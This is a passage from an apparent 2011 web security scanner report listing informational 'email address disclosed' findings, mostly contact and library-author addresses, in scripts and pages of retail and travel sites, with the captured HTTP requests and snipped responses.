Host:	http://secureshopping.mcafee.com
Path:	/

Issue detail

The following email address was disclosed in the response:

secureshopping@mcafee.com

Request

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1305509541690-1-kyqx; path=/; expires=Tue, 15-May-2012 01:39:49 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 42652
Date: Mon, 16 May 2011 01:39:49 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>McAfee Secure Shopping - Secure Online Shopping</title>
<meta name="d
...[SNIP]...
<a target=_top class=footer1 href="mailto:secureshopping@mcafee.com">
...[SNIP]...

25.6. http://shop.pacsun.com/js_external/PS_external_validation.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop.pacsun.com
Path:	/js_external/PS_external_validation.js

Issue detail

The following email address was disclosed in the response:

yourname@gmail.com

Request

GET /js_external/PS_external_validation.js HTTP/1.1
Host: shop.pacsun.com
Proxy-Connection: keep-alive
Referer: http://shop.pacsun.com/home.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4A5CD2AB14DCF8A7583336761C49C5F9; PIPELINE_SESSION_ID=f678eccdc0a8116800f19d6e8f776319; stop_mobi=yes; Country=US; Currency=USD; mbox=check#true#1305510282|session#1305510221453-787352#1305512082; fsr.a=1305510222587

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 10 May 2011 18:15:03 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 39093
Cache-Control: max-age=3600
Date: Mon, 16 May 2011 01:43:43 GMT
Connection: close

/***** Email validation *****/

$.extend({
getUrlVars: function(){
var vars = [], hash;
var hashes = window.location.href.slice(window.location.href.indexOf('?') + 1).split('&');
for(va
...[SNIP]...
l(displayDate());
   $("#subscribeForm").validate({
       rules:{
           email:{
               email: true
           },
           email2:{
               required:function(element) {
                   return $('#subscribeForm').find('input#email1').val() != 'yourname@gmail.com' || ($('#subscribeForm').find('input#email1').val() == 'yourname@gmail.com' && $('#subscribeForm').find('input#mobile').val() == '(555) 555-5555')},
               email: true
           },
           zip:{
               required:function(element) {
                   return $('#subscribeForm').find('input#email1').val() != 'yourname@gmail.com' || ($('#subscribeForm').find('input#email1').val() == 'yourname@gmail.com' && $('#subscribeForm').find('input#mobile').val() == '(555) 555-5555')},
               digits:true,
               minlength:5,
               digits:true
           },
           BIRTHMM:{
               required:function(element) {
                   return $('#subscribeForm').find('input#email1').val() != 'yourname@gmail.com' || ($('#subscribeForm').find('input#email1').val() == 'yourname@gmail.com' && $('#subscribeForm').find('input#mobile').val() == '(555) 555-5555')},
               minlength:2,
               digits:true
           },
           BIRTHDD:{
               required:function(element) {
                   return $('#subscribeForm').find('input#email1').val() != 'yourname@gmail.com' || ($('#subscribeForm').find('input#email1').val() == 'yourname@gmail.com' && $('#subscribeForm').find('input#mobile').val() == '(555) 555-5555')},
               minlength:2,
               digits:true
           },
           BIRTHCCYY:{
               required:function(element) {
                   return $('#subscribeForm').find('input#email1').val() != 'yourname@gmail.com' || ($('#subscribeForm').find('input#email1').val() == 'yourname@gmail.com' && $('#subscribeForm').find('input#mobile').val() == '(555) 555-5555')},
               minlength:4,
               digits:true
           },
           gender:{
               required:function(element) {
                   return $('#subscribeForm').find('input#email1').val() != 'yourname@gmail.com' || ($('#subscribeForm').find('input#email1').val() == 'yourname@gmail.com' && $('#subscribeForm').find('input#mobile').val() == '(555) 555-5555')}
           },
           mobile:{
               minlength:10,
               maxlength:14
           }
       },
        highlight: function(element, errorClass, validClass) {
           if(
...[SNIP]...
);
       } );


}

/***** EOF Email Validation *****/

/***** Footer form interaction *****/
function formInputs(input){
var y = input.name;
var x = input.value;
switch(y){
case "email":
if (x == "yourname@gmail.com"){input.value = "";input.className = "blackInput";}
break;
case "postalcode":
if (x == "Zip Code"){input.value = "";input.className = "blackInput";}
break;
}
};

function formInputsOut(input){
var y = input.name;
var x = input.value;
switch(y){
case "email":
if (x == ""){input.value = "yourname@gmail.com";input.className = "greyInput";}
break;
case "postalcode":
if (x == ""){input.value = "Zip Code";input.className = "greyInput";}
break;
}
};

/***** EOF Footer form interaction *****/

25.7. http://shoprunner.force.com/content/JsContentElementsGNC previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shoprunner.force.com
Path:	/content/JsContentElementsGNC

Issue detail

The following email address was disclosed in the response:

MemberServices@ShopRunner.com

Request

Response

HTTP/1.1 200 OK
Server:
X-Powered-By: Salesforce.com ApexPages
P3P: CP="CUR OTR STA"
Last-Modified: Mon, 16 May 2011 01:05:43 GMT
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 108383
Cache-Control: public, max-age=19338
Expires: Mon, 16 May 2011 07:05:34 GMT
Date: Mon, 16 May 2011 01:43:16 GMT
Connection: close

function sr_run(){
return false
}

/* -----------------------------------------
* Global Variables
----------------------------------------- */
//the shoprunner object
var sr_$={};
sr_$.contents={}
...[SNIP]...
<a href="mailto:MemberServices@ShopRunner.com">MemberServices@ShopRunner.com</a>
...[SNIP]...
<a href="mailto:MemberServices@ShopRunner.com">MemberServices@ShopRunner.com</a>
...[SNIP]...
<a href="mailto:MemberServices@ShopRunner.com">MemberServices@ShopRunner.com</a>
...[SNIP]...
<a href="mailto:MemberServices@ShopRunner.com">MemberServices@ShopRunner.com</a>
...[SNIP]...

25.8. http://shoprunner.force.com/content/JsContentElementsPET previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shoprunner.force.com
Path:	/content/JsContentElementsPET

Issue detail

The following email address was disclosed in the response:

MemberServices@ShopRunner.com

Request

Response

HTTP/1.1 200 OK
Server:
X-Powered-By: Salesforce.com ApexPages
P3P: CP="CUR OTR STA"
Last-Modified: Mon, 16 May 2011 01:05:40 GMT
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 106125
Cache-Control: public, max-age=19577
Expires: Mon, 16 May 2011 07:05:43 GMT
Date: Mon, 16 May 2011 01:39:26 GMT
Connection: close

function sr_run(){
return false
}

/* -----------------------------------------
* Global Variables
----------------------------------------- */
//the shoprunner object
var sr_$={};
sr_$.contents={}
...[SNIP]...
<a href="mailto:MemberServices@ShopRunner.com">MemberServices@ShopRunner.com</a>
...[SNIP]...
<a href="mailto:MemberServices@ShopRunner.com">MemberServices@ShopRunner.com</a>
...[SNIP]...
<a href="mailto:MemberServices@ShopRunner.com">MemberServices@ShopRunner.com</a>
...[SNIP]...
<a href="mailto:MemberServices@ShopRunner.com">MemberServices@ShopRunner.com</a>
...[SNIP]...

25.9. http://static.bhphotovideo.com/FrameWork/js/common.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.bhphotovideo.com
Path:	/FrameWork/js/common.js

Issue detail

The following email address was disclosed in the response:

code@andresvidal.com

Request

GET /FrameWork/js/common.js?v=05152011 HTTP/1.1
Host: static.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/bnh/controller/home?KW=BANNER2&img=bh_wl.gif
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0pnRNQQMwR!-112699937; cookieID=18154535221305509932941

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 09 May 2011 03:00:18 GMT
Content-Length: 6834
ETag: "1ab2-4dc758c2"
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: public, max-age=7200
Date: Mon, 16 May 2011 01:44:01 GMT
Connection: close

/* **************************************************
Copyright (c) 2008, B & H Foto & Electronics Corp. All rights reserved. http://wwww.bhphotovideo.com - Author: Andres Vidal
************************************************** */

/**
* jQuery-Plugin "Placeholder"
*
* @version: 1.1.0, 01.19.2011
*
* @author: Andres Vidal
* code@andresvidal.com
* http://www.andresvidal.com
*
* Instructions: Call $(selector).placeholder(options) on an input element with an attribute placeholder.
* @example: $('input#search').placeholder(); // <in
...[SNIP]...
idget with Profile Support.
* This widget extends the default functionality of window.open() with the use of powerful profiles.
*
* @version: 1.0.0, 08.04.2010
* @author: Andres Vidal
* code@andresvidal.com
* http://www.andresvidal.com/labs
*
* @arg url(mixed) The popup url or object containing an href. Example: Use object [this] or string 'http://www.google.com'
* @arg name(stri
...[SNIP]...

25.10. http://static.bhphotovideo.com/FrameWork/js/jquery/jquery.styledDropdown.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.bhphotovideo.com
Path:	/FrameWork/js/jquery/jquery.styledDropdown.min.js

Issue detail

The following email address was disclosed in the response:

code@andresvidal.com

Request

GET /FrameWork/js/jquery/jquery.styledDropdown.min.js HTTP/1.1
Host: static.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/bnh/controller/home?KW=BANNER2&img=bh_wl.gif
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0pnRNQQMwR!-112699937; cookieID=18154535221305509932941

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 19 Apr 2010 03:00:13 GMT
ETag: "f26-4bcbc73d"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 3878
Cache-Control: public, max-age=7200
Date: Mon, 16 May 2011 01:39:03 GMT
Connection: close

/**
* Styled Dropdown - jQuery Plugin v0.1.0
* Easily converts SELECT elements to eventful and styleable DL, DT, DD elements.
* Requires jQuery 1.3.x
*
* Copyright 2010, Andres Vidal (code@andresvidal.com)
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://www.andresvidal.com/license/styledDropdown
*
* Instructions: Call $(selector).styledDropdown(options) on an element with a jQuery
...[SNIP]...

25.11. http://widgets.outbrain.com/OutbrainRater.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://widgets.outbrain.com
Path:	/OutbrainRater.js

Issue detail

The following email address was disclosed in the response:

feedback@outbrain.com

Request

GET /OutbrainRater.js HTTP/1.1
Host: widgets.outbrain.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=8212382c-a920-4555-8b81-259021933018; _lvs2="uaMqgoSgWEtsUDbY+ohiLYEnd3D/JQAT"; _lvd2="e0MjrHqXH8wCQxDytJnB4N69GWfDw5tMPzeXAm/v95E+Pd3eRDQ31LtR9rpG/iaskJWlQEP7SN0="; _rcc2=NXlRX9sMiunRtm+CPv1EhOsE3s6itk45

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:19:48 GMT
Server: Apache
Last-Modified: Sun, 08 May 2011 14:26:01 GMT
ETag: "100029-2302d-4a2c4808f3040"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 143405
Content-Type: application/x-javascript
Cache-Control: private, max-age=604800
Age: 0
Expires: Mon, 23 May 2011 01:19:48 GMT
Connection: Keep-Alive

window.OB_releaseVer="37803";var ObStartTime=typeof ObStartTime!="undefined"?ObStartTime:(new Date).getTime(),outbrain_browsers=typeof outbrain_browsers=="object"?outbrain_browsers:new (function(){thi
...[SNIP]...
<a href='mailto:feedback@outbrain.com'>feedback@outbrain.com</a>
...[SNIP]...

25.12. http://www.acehardware.com/js/LIB_core.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.acehardware.com
Path:	/js/LIB_core.js

Issue detail

The following email address was disclosed in the response:

sam@conio.net

Request

GET /js/LIB_core.js HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:42:46 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 04 May 2011 08:47:00 GMT
ETag: "511655-a9a7-4a26f4cc6a900"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Mon, 16 May 2011 07:42:46 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Content-Length: 43431
Connection: close
Content-Type: application/x-javascript

/* Prototype JavaScript framework, version 1.4.0
* (c) 2005 Sam Stephenson <sam@conio.net>
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the
...[SNIP]...

25.13. http://www.cruisecritic.com/js/global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cruisecritic.com
Path:	/js/global.js

Issue detail

The following email address was disclosed in the response:

name@example.com

Request

GET /js/global.js?cb=324c14 HTTP/1.1
Host: www.cruisecritic.com
Proxy-Connection: keep-alive
Referer: http://www.cruisecritic.com/reviews/cruiseline.cfm?CruiseLineID=16
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SUBSCRIBENEWSLETTER=1

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 26129
Content-Type: application/x-javascript
Content-Location: http://www.cruisecritic.com/js/global.js?cb=324c14
Last-Modified: Fri, 06 May 2011 18:36:07 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:29:54 GMT

function obj(name)
{
   return document.getElementById(name);
}

function isDefined(variable)
{
   if(typeof(variable) !== 'undefined' && variable !== null)
       return true;

   return false;
}
...[SNIP]...
n van Zonneveld', 'van');
// * returns 1: 'van Zonneveld' // * example 2: strstr('Kevin van Zonneveld', 'van', true);
// * returns 2: 'Kevin '
// * example 3: strstr('name@example.com', '@');
// * returns 3: '@example.com'
// * example 4: strstr('name@example.com', '@', true); // * returns 4: 'name'
var pos = 0;

haystack += '';
pos = haystack.indexOf(needle); if (pos == -1) {
return false;
} else {
if (bool) {
...[SNIP]...

25.14. http://www.fingerhut.com/js/jquery.cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fingerhut.com
Path:	/js/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.de

Request

GET /js/jquery.cookie.js HTTP/1.1
Host: www.fingerhut.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PIPELINE_SESSION_ID=f669947d7f000001339214b19bb1da70; JSESSIONID=D9080B11BF5EB75E4ECE7E0CCB991804; LOG_CAMPAIGN_TRACKING_471=62413836; __g_u=321574908789509_1_0.1_0_5_1305941208323; __g_c=w%3A1%7Cb%3A2%7Cc%3A321574908789509%7Cd%3A1%7Ca%3A1%7Ce%3A0.1%7Cf%3A0%7Cr%3A

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 11 May 2011 13:33:50 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 4246
Cache-Control: max-age=1490
Expires: Mon, 16 May 2011 01:51:40 GMT
Date: Mon, 16 May 2011 01:26:50 GMT
Connection: close

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

25.15. https://www.fingerhut.com/js/jquery.cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.fingerhut.com
Path:	/js/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.de

Request

GET /js/jquery.cookie.js HTTP/1.1
Host: www.fingerhut.com
Connection: keep-alive
Referer: https://www.fingerhut.com/user/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PIPELINE_SESSION_ID=f669947d7f000001339214b19bb1da70; LOG_CAMPAIGN_TRACKING_471=62413836; __g_u=321574908789509_1_0.1_0_5_1305941208323; sifrFetch=true; isvtid_ets=1305509228072; s_vi=[CS]v1|26E83EB6051D105C-4000010840053157[CE]; utag_main=_st:1305511030631$ses_id:1305510088374%3Bexp-session; isvt_visitor=jd0hQQoBC2cAAEZ16P4AAAAAAAj565SmEjOKVW; __utmz=142754730.1305509233.1.1.utmcsr=ad.doubleclick.net|utmccn=(referral)|utmcmd=referral|utmcct=/adi/x1.rtb/fingerhut/doubledma/ron/ctest; __utma=142754730.883000967.1305509233.1305509233.1305509233.1; __utmb=142754730.1.10.1305509233; __utmc=142754730; IS3_GSV=DPL-2_TES-1305509228_PCT-1305509228_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com_GeoCc-NA_GeoCn-United%20States_GeoDa-623_GeoAc-214_GeoLa-32.782501_GeoLo-%252D96.820702_GeoIs-SoftLayer%20Technologies_GeoOr-Media%20Visions; IS3_History=1301114322-1-41_1--1+2--1+3--1+4--1+6--1+8--1+9--1+11--1+12--1+13--1+15--1+16--1+17--1__1-2-3-4-6-8-9-11-12-13-15-16-17_; bnTrail=%5B%22http%3A%2F%2Fwww.fingerhut.com%2Fuser%2Fstart_credit_app.jsp%3F%3D%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static%22%5D; USER_SESSION_VALIDATE_COOKIE=false; fsr.s={"v":1,"rid":"1305509244105_369994","ru":"http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest\u003bsz=728x90\u003bclick=http://bn.xp1.ru4.com/bclick?_f=8BWls1L7DgGK&_o=15607&_eo=747980&_et=1305508796&_a=1791737&_s=0&_d=1125798&_pm=747980&_pn=17918465&redirect=\u003bu=17918465\u003bord=6394684?","r":"ad.doubleclick.net","st":"","pv":1,"to":3,"c":"http://www.fingerhut.com/user/start_credit_app.jsp","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1,"f":1305509440687}; mbox=session#1305509219944-478846#1305511302|PC#1305509219944-478846.17#1308101442|check#true#1305509502; bn_u=6923549102649626308; s_cc=true; s_sq=%5B%5BB%5D%5D; fsr.a=1305509461406; JSESSIONID=3C769805A330D33749C721314DA0795A; __g_c=w%3A1%7Cb%3A4%7Cc%3A321574908789509%7Cd%3A1%7Ca%3A1%7Ce%3A0.1%7Cf%3A0%7Cr%3Ahttp%24*%24//www.fingerhut.com/section/Electronics/4.uts_2___1305509448582%7Cg%3A1

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 11 May 2011 13:33:50 GMT
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 4246
Expires: Mon, 16 May 2011 01:31:23 GMT
Date: Mon, 16 May 2011 01:31:23 GMT
Connection: keep-alive

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

25.16. http://www.guitarcenter.com/Includes/GuitarCenter/Scripts/minified/JS_Header.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.guitarcenter.com
Path:	/Includes/GuitarCenter/Scripts/minified/JS_Header.js

Issue detail

The following email address was disclosed in the response:

id@Ss.tc

Request

Response

HTTP/1.1 200 OK
Content-Length: 69210
Content-Type: application/x-javascript
Last-Modified: Wed, 27 Apr 2011 11:51:54 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
SN: 28
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:40:16 GMT

function getCookie(name){var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;while(i<clen){var j=i+alen;if(document.cookie.substring(i,j)==arg){return getCookieVal(j);}i=docum
...[SNIP]...
)`2'';@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s.b=s.
...[SNIP]...

25.17. http://www.guitarcenter.com/Includes/Guitarcenter/Guitarcenter.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.guitarcenter.com
Path:	/Includes/Guitarcenter/Guitarcenter.css

Issue detail

The following email address was disclosed in the response:

ebhernandez@guitarcenter.com

Request

GET /Includes/Guitarcenter/Guitarcenter.css HTTP/1.1
Host: www.guitarcenter.com
Proxy-Connection: keep-alive
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lwhsuvawhj2nga0zihmkuetv; uid=63077232-5a8c-4dcd-b23d-e9787a0b3e86; CjPID=2537521; CjAID=10453836; ref=; ref_d=5/15/2011 9:40:10 PM; source=4ACJWXX2; ad_id=; orig_ref=; orig_ref_d=5/15/2011 9:40:10 PM; orig_source=4ACJWXX2; orig_ad_id=; UNICASOURCE=4ACJWXX2; UNICASOURCEL=4ACJWXX2; IsLoyaltyAvailable=False

Response

HTTP/1.1 200 OK
Content-Length: 45904
Content-Type: text/css
Last-Modified: Tue, 26 Apr 2011 21:33:30 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
SN: 43
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:40:16 GMT

.../**Last edited on 7-30-2009 by Erick B. Hernandez (email: ebhernandez@guitarcenter.com)**/
/******** BEGIN CSS RESET - DO NOT MODIFY**********/
/* this resets the styles so they are the same across all browers/platforms */
body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldse
...[SNIP]...

25.18. http://www.helzberg.com/includes/jquery/plugins/jquery.hoverIntent.minified.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.helzberg.com
Path:	/includes/jquery/plugins/jquery.hoverIntent.minified.js

Issue detail

The following email address was disclosed in the response:

brian@cherne.net

Request

GET /includes/jquery/plugins/jquery.hoverIntent.minified.js HTTP/1.1
Host: www.helzberg.com
Proxy-Connection: keep-alive
Referer: http://www.helzberg.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=67638cb10049a42429ba4a456b90.helzberg-b2c-i4; customer=none; basket=none; fsr.a=1305510041208

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 09 May 2011 16:45:27 GMT
ETag: "649-910d97c0"
Accept-Ranges: bytes
Content-Length: 1609
Content-Type: application/javascript
Cache-Control: max-age=7200
Date: Mon, 16 May 2011 01:40:43 GMT
Connection: close

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

25.19. http://www.magicalkingdoms.com/blog/category/disneyland-paris/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.magicalkingdoms.com
Path:	/blog/category/disneyland-paris/

Issue detail

The following email address was disclosed in the response:

admin@magicalkingdoms.com

Request

Response

25.20. http://www.magicalkingdoms.com/blog/wp-content/plugins/jquery-colorbox/js/jquery.colorbox-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.magicalkingdoms.com
Path:	/blog/wp-content/plugins/jquery-colorbox/js/jquery.colorbox-min.js

Issue detail

The following email address was disclosed in the response:

jack@colorpowered.com

Request

GET /blog/wp-content/plugins/jquery-colorbox/js/jquery.colorbox-min.js?ver=1.3.15 HTTP/1.1
Host: www.magicalkingdoms.com
Proxy-Connection: keep-alive
Referer: http://www.magicalkingdoms.com/blog/2011/05/09/the-dream-differences-on-disney-cruise-line/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cf6190390f14fba80a77f4845931a480

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:20:10 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Last-Modified: Thu, 31 Mar 2011 13:42:10 GMT
ETag: "6202b2-23e7-49fc775c51080"
Accept-Ranges: bytes
Content-Length: 9191
Content-Type: application/javascript

// ColorBox v1.3.15 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2010 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
